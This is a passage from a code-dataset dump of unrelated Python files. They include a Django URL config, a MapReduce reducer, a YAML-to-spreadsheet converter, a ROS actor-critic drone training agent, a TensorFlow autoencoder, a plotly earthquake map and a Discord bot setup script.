line.strip().split()\n\tprint(check_anagram(words[0], words[1]))\n","sub_path":"z_only_python/anagram_21.py","file_name":"anagram_21.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"356504663","text":"from django.urls import path, include\nfrom . import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"testing\", views.testing, name=\"testing\"),\n path(\"signup\", views.signup, name=\"signup\"),\n path(\"login\", LoginView.as_view(), name=\"login\"),\n path(\"profile\", views.profile, name=\"profile\"),\n path(\"logout\", LogoutView.as_view(), name=\"logout\"),\n]","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"376988481","text":"#!/usr/bin/python3\n\nimport sys\n\noldKey = None\nurlTotalUIDs = 0\n\nfor line in sys.stdin:\n data = line.strip().split(\"\\t\")\n\n if len(data) != 2:\n continue\n\n thisKey, uid = data\n\n if oldKey and thisKey != oldKey:\n print(\"{0}\\t{1}\".format(oldKey, urlTotalUIDs))\n urlTotalUIDs = 0\n \n urlTotalUIDs += 1\n oldKey = thisKey\n\nif oldKey != None:\n print(\"{0}\\t{1}\".format(thisKey, urlTotalUIDs))\n","sub_path":"lab2-super/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"552182329","text":"# podmd\n# Script to read yml files and write an ods spreadsheet for mapping codes\n# end_podmd\n\nimport yaml\nimport os\nimport collections\nfrom pyexcel_ods import save_data\n\nmapp = []\nmapp.append(['diagnosistext']+['icdmorphologycode']+['icdmorphology']+['icdtopographycode']+['icdtopography']+['ncit:term']+['ncit:code'])\nyamldir = '../current/'\nodsdir = '../editing/'\nfor filename in os.listdir(yamldir): # Specify directory\n if filename.endswith(\"yaml\"):\n yamlfile = yamldir + filename\n with open(yamlfile, \"r\") as stream:\n data = yaml.load(stream)\n #print data\n try:\n diagnosis = [data['examples'][0]['labels']]\n icdom_c = [data['input'][0]['id'].replace('icdom-','')]\n icdom = [data['input'][0]['label']]\n icdot_c = [data['input'][1]['id'].replace('icdot-','')]\n icdot = [data['input'][1]['label']]\n #seer = [data['equivalents'][1]['id'].replace('seer:','')]\n ncit = [data['equivalents'][0]['label']]\n ncit_c = [data['equivalents'][0]['id'].replace(\"ncit:\",\"\")]\n mapp.append(diagnosis+icdom_c+icdom+icdot_c+icdot+seer+ncit+ncit_c)\n except:\n pass\n\n#print mapp\n\nmapping = collections.OrderedDict()\n\nsheetx = {\"codes\":mapp}\nsave_data(odsdir + \"table_from_yaml.ods\",sheetx)\n","sub_path":"tools/yaml_to_ods.py","file_name":"yaml_to_ods.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562161537","text":"#!/usr/bin/env python\nfrom __future__ import print_function, division\n\nimport roslib\nimport random\nroslib.load_manifest('actor_critic_agent')\nimport sys\nimport rospy\nimport numpy as np\nfrom scipy import signal\nimport cv2\nfrom sensor_msgs.msg import Image, Imu, LaserScan\nfrom geometry_msgs.msg import Twist\nfrom gazebo_msgs.msg import ModelState, ModelStates, ContactsState\nfrom ardrone_autonomy.msg import Navdata\nfrom std_msgs.msg import Empty\nfrom cv_bridge import CvBridge, CvBridgeError\nimport time\nimport os\nfrom collections import deque\nfrom tf.transformations import quaternion_from_euler\nimport json\nfrom numpy import inf\n\nfrom keras.models import Model\nfrom keras.preprocessing.image import img_to_array, load_img\nfrom autoencoder import autoencoder_network\nimport tensorflow as tf\nfrom keras import backend as K\n\nfrom ReplayBuffer import ReplayBuffer\nfrom ActorNetwork import ActorNetwork\nfrom CriticNetwork import CriticNetwork\nfrom OU import OU\n\n\nclass actor_critic:\n\n def __init__(self): \n random.seed()\n \n self.colliding_flag = False\n \n # Set to 1 to activate training and to 0 to deactivate (reading from a ros parameter)\n self.train_indicator = rospy.get_param('~training')\n \n # Reading the networks' path from a ros parameter\n self.networks_dir = rospy.get_param('~networks_dir')\n \n # Reading the input modality from a ros parameter (laser or camera)\n self.input_mode = rospy.get_param('~input')\n \n # Set to 1 to activate imu inputs and to 0 to deactivate (reading from a ros parameter)\n self.imu_input_mod = rospy.get_param('~imu_input')\n \n self.queue = deque([])\n \n self.graph = tf.get_default_graph() \n \n if self.imu_input_mod == 1:\n self.imu_dim = 37\n else:\n self.imu_dim = 0\n if self.input_mode == \"laser\":\n self.feature_dim = 9\n self.aruco_dim = 3\n self.altitude_dim = 1\n else:\n self.feature_dim = 200\n self.aruco_dim = 0\n self.altitude_dim = 0\n self.state_dim = (3 * self.feature_dim) + self.imu_dim + self.aruco_dim + self.altitude_dim\n self.action_dim = 3\n self.buffer_size = 100000\n self.batch_size = 32\n self.gamma = 0.99\n self.tau = 0.001 #Target Network HyperParameters\n self.lra = 0.0001 #Learning rate for Actor\n self.lrc = 0.001 #Lerning rate for Critic\n self.epsilon = 1\n \n self.ou = OU()\n \n # Initialization of state, action and noise vectors\n self.action = np.zeros((1, self.action_dim))\n self.action_noise = np.zeros((1, self.action_dim))\n self.state = np.zeros(self.state_dim)\n \n with self.graph.as_default():\n # Initialization of the autoencoder network\n self.autoencoder_network = autoencoder_network(self.networks_dir)\n #Tensorflow GPU optimization\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n K.set_session(sess)\n # Initialization of the actor and critic networks\n self.actor = ActorNetwork(sess, self.state_dim, self.action_dim, self.batch_size, self.tau, self.lra)\n self.critic = CriticNetwork(sess, self.state_dim, self.action_dim, self.batch_size, self.tau, self.lrc) \n #Now load the weight\n rospy.loginfo(\"Now we load the weight\")\n try:\n self.actor.model.load_weights(self.networks_dir + \"actormodel.h5\")\n self.critic.model.load_weights(self.networks_dir + \"criticmodel.h5\")\n self.actor.target_model.load_weights(self.networks_dir + \"actormodel.h5\")\n self.critic.target_model.load_weights(self.networks_dir + \"criticmodel.h5\")\n rospy.loginfo(\"Weight load successfully\")\n except:\n rospy.logwarn(\"Cannot find the weight\")\n \n #Create replay buffer\n self.buff = ReplayBuffer(self.buffer_size)\n \n self.aruco_limit = 4.0\n self.altitude_limit = 2.0\n self.imu_msg = np.zeros(self.imu_dim)\n self.bumper_msg = None\n self.navdata_msg = None\n self.aruco_msg = None\n self.laser_msg = None\n self.model_states_pose_msg = None \n self.count = 0\n self.step = 0\n self.bridge = CvBridge()\n\n actual_time = rospy.get_rostime()\n self.start_time = actual_time.secs + \\\n actual_time.nsecs / 1000000000\n \n self.start_pos = Twist()\n self.start_pos.linear.x = 0.0\n self.start_pos.linear.y = 0.0\n self.start_pos.linear.z = 0.0\n \n self.total_reward = 0.0\n \n self.position_list = [[0, 0], [20, 0], [20, -20], [0, -20]]\n \n # Subscribers initialization\n self.image_sub = rospy.Subscriber(\"/ardrone/front/image_raw\",\n Image, self.callback_image)\n self.imu_sub = rospy.Subscriber(\"/ardrone/imu\",\n Imu, self.callback_imu)\n self.bumper_sub = rospy.Subscriber(\"/ardrone/bumper\",\n ContactsState, self.callback_bumper)\n self.navdata_sub = rospy.Subscriber(\"/ardrone/navdata\",\n Navdata, self.callback_navdata)\n self.aruco_sub = rospy.Subscriber(\"/ardrone/aruco/pose\",\n Twist, self.callback_aruco)\n self.model_states_sub = rospy.Subscriber(\"/gazebo/model_states\",\n ModelStates, self.callback_model_states)\n self.laser_sub = rospy.Subscriber(\"/ardrone/laser\",\n LaserScan, self.callback_laser)\n \n rospy.loginfo(\"Subscribers initialized\")\n \n # Publishers initialization\n self.model_state_pub = rospy.Publisher('/gazebo/set_model_state', ModelState, queue_size=10)\n self.reset_pub = rospy.Publisher('/ardrone/reset', Empty, queue_size=10)\n self.takeoff_pub = rospy.Publisher('/ardrone/takeoff', Empty, queue_size=10)\n self.land_pub = rospy.Publisher('/ardrone/land', Empty, queue_size=10)\n self.cmd_vel_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n \n rospy.loginfo(\"Publishers initialized\")\n \n # Small sleep to give time to publishers to open the topics\n rospy.sleep(0.5) \n \n rospy.loginfo(\"taking off\")\n self.takeoff_pub.publish(Empty())\n\n def callback_image(self,data):\n if (self.navdata_msg != None and \\\n self.navdata_msg.state == 3): # The actor-critic system works only when the drone is flying\n \n rospy.logdebug(\"Episode : \" + str(self.count) + \" Replay Buffer \" + str(self.buff.count())) \n \n loss = 0\n\n # Rmoving inf from laser ranges\n if self.laser_msg != None:\n laser_ranges = np.asarray(self.laser_msg.ranges)\n laser_ranges[laser_ranges == inf] = 0\n \n # Calculating laser punishment\n laser_cost = 0.0\n if self.laser_msg != None:\n inverted_ranges = 1 - (laser_ranges / self.laser_msg.range_max)\n gaussian_ranges = np.multiply(inverted_ranges, signal.gaussian(self.feature_dim, (self.feature_dim / 2 * 0.8)))\n laser_cost = -np.sum(gaussian_ranges) / self.feature_dim\n rospy.loginfo(\"Laser range punishment: \" + str(laser_cost))\n \n # Calculating the punishment for colliding\n is_colliding = False\n collision_cost = 0.0\n if self.colliding_flag:\n is_colliding = True\n collision_cost = -10.0\n rospy.logdebug(\"Collisions punishment: \" + str(collision_cost))\n \n # Calculating the time elapsed from the last respawn\n actual_time = rospy.get_rostime() \n time_stamp = actual_time.secs + \\\n actual_time.nsecs / 1000000000 \n time_elapsed = time_stamp - self.start_time\n rospy.logdebug(\"Time elapsed: \" + str(time_elapsed))\n \n # Calculating the aruco distance reward\n aruco_dist = 0.0\n aruco_cost = 0.0 \n if self.aruco_msg != None:\n aruco_dist = np.sqrt(self.aruco_msg.linear.x**2 + \\\n self.aruco_msg.linear.y**2 + \\\n self.aruco_msg.linear.z**2)\n if aruco_dist == 0.0 or aruco_dist > self.aruco_limit:\n aruco_dist = self.aruco_limit\n aruco_cost = 1.0 - (aruco_dist / self.aruco_limit)\n rospy.logdebug(\"Aruco distance reward: \" + str(aruco_cost))\n \n # Calculating the traveled distance reward and the altitude punishment\n trav_dist = 0.0\n alt_cost = 0.0\n if self.model_states_pose_msg != None:\n actual_pos = self.model_states_pose_msg.position\n trav_dist = np.sqrt((actual_pos.x - self.start_pos.linear.x)**2 + \\\n (actual_pos.y - self.start_pos.linear.y)**2)\n trav_cost = trav_dist / time_elapsed\n alt_cost = -abs(1 - actual_pos.z)\n rospy.logdebug(\"Travel distance reward: \" + str(trav_cost))\n \n # Calculating the angular velocity punishment\n angular_cost = 0\n if self.imu_msg != None:\n angular_cost = -abs(self.imu_msg[6])\n rospy.loginfo(\"Angular punishment: \" + str(angular_cost))\n \n # Calculating the step reward\n step_reward = collision_cost + \\\n (10 * aruco_cost) + \\\n trav_cost + alt_cost \\\n + laser_cost #+ angular_cost\n rospy.logdebug(\"Step reward: \" + str(step_reward))\n \n # Calculating the total reward\n self.total_reward += step_reward\n rospy.logdebug(\"Total reward: \" + str(self.total_reward))\n \n image_features = np.zeros(self.feature_dim)\n if self.input_mode == \"camera\":\n rospy.logwarn(self.input_mode + \" CAMERA\")\n # Reading the camera image from the topic\n try:\n cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as err:\n rospy.logerror(err)\n \n # Risizeing the image to 160x80 pixel for the convolutional network\n cv_image_resized = cv2.resize(cv_image, (160, 80))\n #array_image = np.asarray(cv_image_resized)\n array_image = img_to_array(cv_image_resized)\n input_image = np.zeros((1, 80, 160, 3))\n input_image[0] = array_image\n input_image /= 255.0\n \n # Calculating image features\n with self.graph.as_default():\n image_features = self.autoencoder_network.run_network(input_image)\n elif self.laser_msg != None:\n rospy.logwarn(self.input_mode + \" LASER\")\n # Reading laser data as state features\n image_features = laser_ranges / self.laser_msg.range_max \n \n # Adding the features to the features list\n if len(self.queue) == 0:\n self.queue.append(image_features)\n self.queue.append(image_features)\n self.queue.append(image_features)\n else:\n self.queue.popleft()\n self.queue.append(image_features)\n \n rospy.logdebug(\"Queue length: \" + str(len(self.queue)))\n rospy.logdebug(\"Image Features: \" + str(image_features.shape))\n rospy.logdebug(\"Imu length: \" + str(len(self.imu_msg)))\n \n # Create the state vector\n new_state = np.concatenate((self.queue[0].flatten(), \n self.queue[1].flatten(),\n self.queue[2].flatten()))\n if self.imu_input_mod == 1:\n new_state = np.concatenate((new_state,\n self.imu_msg))\n if self.input_mode == \"laser\":\n # Creating aruco features\n aruco_features = np.zeros(self.aruco_dim)\n if self.aruco_msg != None:\n if self.aruco_msg.linear.x == 0 or self.aruco_msg.linear.x > self.aruco_limit:\n aruco_features[0] = 1.0\n else:\n aruco_features[0] = self.aruco_msg.linear.x / self.aruco_limit\n if self.aruco_msg.linear.y == 0 or self.aruco_msg.linear.y > self.aruco_limit:\n aruco_features[1] = 1.0\n else:\n aruco_features[1] = self.aruco_msg.linear.y / self.aruco_limit\n if self.aruco_msg.linear.z == 0 or self.aruco_msg.linear.y > self.aruco_limit:\n aruco_features[2] = 1.0\n else:\n aruco_features[2] = self.aruco_msg.linear.z / self.aruco_limit\n #aruco_features[3] = self.aruco_msg.angular.x / np.pi\n #aruco_features[4] = self.aruco_msg.angular.y / np.pi\n #aruco_features[5] = self.aruco_msg.angular.z / np.pi\n \n # Creating altitude feature \n altitude_feature = np.zeros(1) \n if self.model_states_pose_msg != None:\n altitude_value = self.model_states_pose_msg.position.z\n if altitude_value > self.altitude_limit:\n altitude_feature[0] = 1.0\n else:\n altitude_feature[0] = altitude_value / self.altitude_limit\n new_state = new_state = np.concatenate((new_state,\n aruco_features,\n altitude_feature))\n \n rospy.logdebug(\"State length: \" + str(len(new_state)))\n rospy.loginfo(\"State: \" + str(new_state))\n \n # Add replay buffer\n done = False\n if is_colliding or \\\n (aruco_cost > 0.8):\n done = True\n self.buff.add(self.state, self.action[0], step_reward, new_state, done)\n \n # Calculating new action\n with self.graph.as_default():\n a_t_original = self.actor.model.predict(new_state.reshape(1, new_state.shape[0]))\n self.action_noise[0][0] = self.train_indicator * max(self.epsilon, 0) * \\\n self.ou.function(a_t_original[0][0], 0.3, 0.5, 0.1)\n self.action_noise[0][1] = self.train_indicator * max(self.epsilon, 0) * \\\n self.ou.function(a_t_original[0][1], 0.0, 0.5, 0.1)\n self.action_noise[0][2] = self.train_indicator * max(self.epsilon, 0) * \\\n self.ou.function(a_t_original[0][2], 0.0, 0.5, 0.1)\n\n self.action[0][0] = a_t_original[0][0] + self.action_noise[0][0]\n self.action[0][1] = a_t_original[0][1] + self.action_noise[0][1]\n self.action[0][2] = a_t_original[0][2] + self.action_noise[0][2]\n# with self.graph.as_default():\n# a_t_original = self.actor.model.predict(new_state.reshape(1, new_state.shape[0]))\n# self.action_noise[0][0] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][0], 0.3, 0.6, 0.1)\n# self.action_noise[0][1] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][1], 0.0, 0.5, 0.1)\n# self.action_noise[0][2] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][2], 0.0, 0.9, 0.1)\n# self.action_noise[0][3] = self.train_indicator * max(self.epsilon, 0) * \\\n# self.ou.function(a_t_original[0][3], 0.0, 0.5, 0.1)\n#\n# self.action[0][0] = a_t_original[0][0] + self.action_noise[0][0]\n# self.action[0][1] = a_t_original[0][1] + self.action_noise[0][1]\n# self.action[0][2] = a_t_original[0][2] + self.action_noise[0][2]\n# self.action[0][3] = a_t_original[0][3] + self.action_noise[0][3]\n \n rospy.loginfo(\"motor comand plus noise: \" + str( self.action[0][2]) + \\\n \" original motor command: \" + str(a_t_original[0][2]) + \\\n \" noise: \" + str(self.action_noise[0][2]))\n\n # Perform an action\n cmd_input = Twist()\n# cmd_input.linear.x = self.action[0][0]\n# cmd_input.linear.y = self.action[0][1]\n# cmd_input.linear.z = self.action[0][2]\n# cmd_input.angular.z = self.action[0][3]\n cmd_input.linear.x = self.action[0][0]\n cmd_input.linear.y = 0.0\n cmd_input.linear.z = self.action[0][1]\n # CAMBIO TEST MOMENTANEOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO\n# if abs(a_t_original[0][2]) > 0.7:\n# self.action[0][2] = 0.0\n cmd_input.angular.z = self.action[0][2]\n self.cmd_vel_pub.publish(cmd_input)\n \n # Updating the state\n self.state = new_state\n \n #Do the batch update\n batch = self.buff.getBatch(self.batch_size)\n states = np.asarray([e[0] for e in batch])\n actions = np.asarray([e[1] for e in batch])\n rewards = np.asarray([e[2] for e in batch])\n new_states = np.asarray([e[3] for e in batch])\n dones = np.asarray([e[4] for e in batch])\n y_t = np.asarray([e[1] for e in batch])\n\n # Calculating Q value \n with self.graph.as_default():\n target_q_values = self.critic.target_model.predict([new_states, self.actor.target_model.predict(new_states)]) \n \n for k in range(len(batch)):\n if dones[k]:\n y_t[k] = rewards[k]\n else:\n y_t[k] = rewards[k] + self.gamma * target_q_values[k]\n \n # Training the network\n with self.graph.as_default():\n if (self.train_indicator):\n loss += self.critic.model.train_on_batch([states, actions], y_t) \n a_for_grad = self.actor.model.predict(states)\n grads = self.critic.gradients(states, a_for_grad)\n self.actor.train(states, grads)\n self.actor.target_train()\n self.critic.target_train()\n \n rospy.logdebug(\"Episode: \" + str(self.count) + \\\n \" Step: \" + str(self.step) + \\\n \" Action: \" + str(self.action) + \\\n \" Reward: \" + str(step_reward) + \\\n \" Loss: \" + str(loss))\n \n self.step +=1\n \n # Starting a newe episode if the drone collide with something or if it's close enough to an aruco board\n if is_colliding or \\\n (aruco_cost > 0.8):\n model_state_msg = ModelState()\n empty_msg = Empty()\n \n # Generating a new random position chosen between 4\n new_position = random.sample(self.position_list, 1)\n \n # Generating a random orientation\n angle = random.random() * 2 * np.pi\n \n rospy.loginfo(\"New position: \" + str(new_position) + \\\n \"New angle: \" + str(angle))\n \n # Creating the model state message to send to set_model_space topic\n model_state_msg.model_name = \"quadrotor\"\n model_state_msg.pose.position.x = new_position[0][0]\n model_state_msg.pose.position.y = new_position[0][1]\n model_state_msg.pose.position.z = 0.0\n quaternion = quaternion_from_euler(0, 0, angle)\n model_state_msg.pose.orientation.x = quaternion[0]\n model_state_msg.pose.orientation.y = quaternion[1]\n model_state_msg.pose.orientation.z = quaternion[2]\n model_state_msg.pose.orientation.w = quaternion[3]\n model_state_msg.reference_frame = \"world\"\n \n self.start_pos.linear.x = new_position[0][0]\n self.start_pos.linear.y = new_position[0][1]\n self.start_pos.linear.z = 0.0\n \n # Reseting the episode starting time\n actual_time = rospy.get_rostime()\n self.start_time = actual_time.secs + \\\n actual_time.nsecs / 1000000000\n # Reseting the image queue\n self.queue = deque([])\n # Reseting state, action and noise vectors\n self.action = np.zeros((1, self.action_dim))\n self.action_noise = np.zeros((1, self.action_dim))\n self.state = np.zeros(self.state_dim)\n \n # Saving the weights\n with self.graph.as_default():\n if (self.train_indicator):\n rospy.loginfo(\"Saving the weights\")\n self.actor.model.save_weights(self.networks_dir + \"actormodel.h5\", overwrite=True)\n with open(self.networks_dir + \"actormodel.json\", \"w\") as outfile:\n json.dump(self.actor.model.to_json(), outfile)\n \n self.critic.model.save_weights(self.networks_dir + \"criticmodel.h5\", overwrite=True)\n with open(self.networks_dir + \"criticmodel.json\", \"w\") as outfile:\n json.dump(self.critic.model.to_json(), outfile)\n\n rospy.loginfo(\"TOTAL REWARD @ \" + str(self.count) +\"-th Episode : Reward \" + str(self.total_reward))\n rospy.loginfo(\"Total Step: \" + str(self.step))\n self.total_reward = 0.0\n self.count += 1\n self.step = 0\n \n # reset the actions\n cmd_input.linear.x = 0.0\n cmd_input.linear.y = 0.0\n cmd_input.linear.z = 0.0\n cmd_input.angular.z = 0.0\n self.cmd_vel_pub.publish(cmd_input)\n \n # Reinitializing position, orientation and status of the drone\n self.land_pub.publish(empty_msg)\n self.model_state_pub.publish(model_state_msg)\n self.reset_pub.publish(empty_msg)\n rospy.sleep(0.5)\n self.takeoff_pub.publish(empty_msg)\n rospy.sleep(0.5)\n self.colliding_flag = False\n \n\n def callback_imu(self,data):\n time_stamp = data.header.stamp.secs + \\\n data.header.stamp.nsecs / 1000000000\n \n orientation = np.zeros(4)\n orientation[0] = data.orientation.x\n orientation[1] = data.orientation.y\n orientation[2] = data.orientation.z\n orientation[3] = data.orientation.w\n \n angular_velocity = np.zeros(3)\n angular_velocity[0] = data.angular_velocity.x\n angular_velocity[1] = data.angular_velocity.y\n angular_velocity[2] = data.angular_velocity.z\n \n linear_acceleration = np.zeros(3)\n linear_acceleration[0] = data.linear_acceleration.x / 10\n linear_acceleration[1] = data.linear_acceleration.y / 10\n # Normalizing the compensation for the gravity in z\n linear_acceleration[2] = data.linear_acceleration.z / 10 \n \n self.imu_msg = np.concatenate((orientation, \n angular_velocity,\n linear_acceleration,\n data.orientation_covariance,\n data.angular_velocity_covariance,\n data.linear_acceleration_covariance))\n \n def callback_bumper(self,data): \n self.bumper_msg = data\n if self.bumper_msg.states != []:\n self.colliding_flag = True\n \n def callback_navdata(self,data): \n # 0: Unknown, 1: Init, 2: Landed, 3: Flying, 4: Hovering, 5: Test\n # 6: Taking off, 7: Goto Fix Point, 8: Landing, 9: Looping\n # Note: 3,7 seems to discriminate type of flying (isFly = 3 | 7) \n self.navdata_msg = data\n \n def callback_aruco(self,data): \n self.aruco_msg = data\n \n def callback_laser(self,data): \n self.laser_msg = data\n \n def callback_model_states(self,data):\n is_there = -1\n for i in range(len(data.name)):\n if data.name[i] == \"quadrotor\":\n is_there = i\n\n if is_there >= 0:\n self.model_states_pose_msg = data.pose[is_there]\n else:\n self.model_states_pose_msg = None \n \ndef main(args):\n #cv2.startWindowThread()\n #cv2.namedWindow(\"Image window\")\n rospy.init_node('optical_flow', anonymous=True, log_level=rospy.INFO)\n \n ac = actor_critic()\n time.sleep(1)\n \n rospy.loginfo(\"<------Data recorder (Author: Nino Cauli)------>\")\n \n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\") \n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"actor_critic_agent/src/actor_critic_agent.py","file_name":"actor_critic_agent.py","file_ext":"py","file_size_in_byte":24303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"564546949","text":"import pandas as pd\nimport mwparserfromhell\nimport json_lines\nimport os,sys\n\nthis_filename = sys.argv[0]\nthis_abs_path = os.path.abspath(this_filename)\ncwd = os.path.abspath(this_filename+\"/..\")\n\njson_filename = cwd+\"/solved.jsonl\"\n\ndatalist = []\n\nwith open(json_filename, 'rb') as f: # opening file in binary(rb) mode \n for idx,item in enumerate(json_lines.reader(f)):\n print(\">> \",idx,\" | \",item['pageTitle'])\n POV_wikicode = mwparserfromhell.parse(item['povVersion'])\n POV_text = POV_wikicode.strip_code()\n SPOV_wikicode = mwparserfromhell.parse(item['solvedpovVersion'])\n SPOV_text = SPOV_wikicode.strip_code()\n datalist.append([POV_text,'POV'])\n datalist.append([SPOV_text,'SPOV'])\n\ndf = pd.DataFrame(datalist, columns = ['body','label'])\ndf.to_csv(cwd+\"/data.csv\", index = False)\n","sub_path":"data/format_wiki_data.py","file_name":"format_wiki_data.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"638205208","text":"#!/usr/bin/python3\n# analyze_earthquakes.py\n\nimport json\n\nfrom plotly.graph_objs import Scattergeo, Layout\nfrom plotly import offline\n\n# Load the data.\nmags, titles, lons, lats = [], [], [], []\nwith open('data/eq_data_30_day_m1.json') as f:\n data = json.load(f)\n\n for earthquake in data['features']:\n try:\n mags.append(earthquake['properties']['mag'])\n titles.append(earthquake['properties']['title'])\n lon, lat, _ = earthquake['geometry']['coordinates']\n lons.append(lon)\n lats.append(lat)\n except:\n print(f'failed to parse: {earthquake}')\n\n# Draw a map of the earthquakes.\noffline.plot(\n {\n 'data': [\n {\n 'type': 'scattergeo',\n 'lon': lons,\n 'lat': lats,\n 'text': titles,\n 'marker': {\n 'size': [5 * mag for mag in mags],\n 'color': mags,\n 'colorscale': 'Portland',\n 'colorbar': {\n 'title': 'Magnitude'\n },\n },\n },\n ],\n 'layout':\n Layout(title='Earthquakes'),\n },\n filename='earthquakes_map.html',\n)\n","sub_path":"programming/python/exercises/crash_course/data_visualization/analyze_earthquakes.py","file_name":"analyze_earthquakes.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"287239671","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nimport os\n\nsave_dir = 'autoencoder_pca_30to2/'\nif not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\nfilename = 'anonymized_data.csv'\n\n\ndef get_data():\n print(f'* calling {get_data.__name__}')\n\n df = pd.read_csv(os.path.join(save_dir, filename))\n print(f'=> get dataframe with shape {df.shape}')\n scaler = MinMaxScaler()\n scaled_data = scaler.fit_transform(df.drop('Label', axis=1))\n labels = df['Label']\n print(f'=> inputs shape {scaled_data.shape}')\n print(f'=> labels shape {labels.shape}')\n return scaled_data, labels\n\n\nif __name__ == '__main__':\n\n inputs, labels = get_data()\n\n # constants\n\n num_inputs = 30\n num_hidden = 2\n num_outputs = num_inputs\n\n learning_rate = 0.01\n\n # placeholders\n\n x = tf.placeholder(tf.float32, shape=[None, num_inputs])\n\n # layers\n\n hidden = tf.contrib.layers.fully_connected(x, num_hidden, activation_fn=None)\n outputs = tf.contrib.layers.fully_connected(hidden, num_outputs, activation_fn=None)\n\n # loss\n loss = tf.reduce_mean(tf.square(outputs - x)) # mse\n\n # optimizer\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train = optimizer.minimize(loss)\n\n # init\n init = tf.global_variables_initializer()\n\n # session\n with tf.Session() as sess:\n\n sess.run(init)\n\n epochs = 1000\n\n for i in range(epochs):\n\n sess.run(train, feed_dict={x: inputs})\n\n lowered_dimension_outputs = hidden.eval(feed_dict={x: inputs})\n\n print(f'=> inputs shape = {inputs.shape}')\n print(f'=> lowered dimension outputs shape = {lowered_dimension_outputs.shape}')\n\n plt.scatter(lowered_dimension_outputs[:, 0], lowered_dimension_outputs[:, 1], c=labels)\n plt.savefig(os.path.join(save_dir, 'fig.png'))\n","sub_path":"tensorflow-basics/autoencoder_pca_30to2.py","file_name":"autoencoder_pca_30to2.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400614028","text":"import configparser\n\n# Original Repository: https://github.com/eibex/reaction-light\nprint(\"Author: eibex\")\nprint(\"Version: 0.0.1\")\nprint(\"License: MIT\\n\")\n\nprint(\"### ### Reaction Light Setup ### ###\")\nprint(\"If you would like more information about any of the steps, type 'help' as an answer.\")\nprint(\"If you would like to abort the configuration close the program. No input will be written to file until the setup is complete.\")\n\nwhile True:\n token = input(\"\\nPaste the token of your bot user (you can create one at: https://discordapp.com/developers/applications/)\\n\")\n if token.lower() == \"help\":\n print(\"\\nThe bot token looks like this: NDYzODUwNzM2OTk3MTA1NjY2.XSH7WA.w0WPO4tafLJ9rZoitBq1Q43AgnQ\\n\")\n continue\n else:\n break\n\nprefix = input(\"\\nInsert the prefix of the bot (help not available for this)\\n\")\n\nwhile True:\n logo = input(\"\\nPaste the URL to your preferred logo file (should end in *.png, *.jpg, *.webp, ...)\\n\")\n if logo.lower() == \"help\":\n print(\"\\nThe logo is the picture shown in the footer of the embeds.\\n\")\n continue\n else:\n break\n\nwhile True:\n admin_a = input(\"Paste the role ID of your admin role.\\n\")\n if admin_a.lower() == \"help\":\n print(\"\\nYou can find the ID of the role by right clicking it in server settings and clicking on 'Copy ID'. You need to enable Developer Mode on Discord.\\n\")\n continue\n else:\n admin_b = input(\"\\nPaste the role ID of your second admin role. If none, type 0.\\n\")\n admin_c = input(\"\\nPaste the role ID of your third admin role. If none, type 0.\\n\")\n break\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\nconfig[\"server\"][\"token\"] = token\nconfig[\"server\"][\"prefix\"] = prefix\nconfig[\"server\"][\"logo\"] = logo\nconfig[\"server_role\"][\"admin_a\"] = admin_a\nconfig[\"server_role\"][\"admin_b\"] = admin_b\nconfig[\"server_role\"][\"admin_c\"] = admin_c\nwith open(\"config.ini\", \"w\") as f:\n config.write(f)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556263650","text":"import argparse\nimport logging\nimport os\nimport paddle\nimport paddle.fluid as fluid\n\nfrom nets import bow_net\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Tower CTR example\")\n parser.add_argument(\n '--batch_size',\n type=int,\n default=32,\n help=\"The size of mini-batch (default:32)\")\n parser.add_argument(\n '--thread_num',\n type=int,\n default=10,\n help=\"thread num\")\n parser.add_argument(\n '--num_passes',\n type=int,\n default=10,\n help=\"The number of passes to train (default: 10)\")\n parser.add_argument(\n '--model_output_dir',\n type=str,\n default='models',\n help='The path for model to store (default: models)')\n\n return parser.parse_args()\n\nclass Model(object):\n def __init__(self):\n self.label = fluid.layers.data(name=\"slot_1\", shape=[-1, 1],\n dtype=\"int64\", lod_level=0,\n append_batch_size=False)\n self.user = 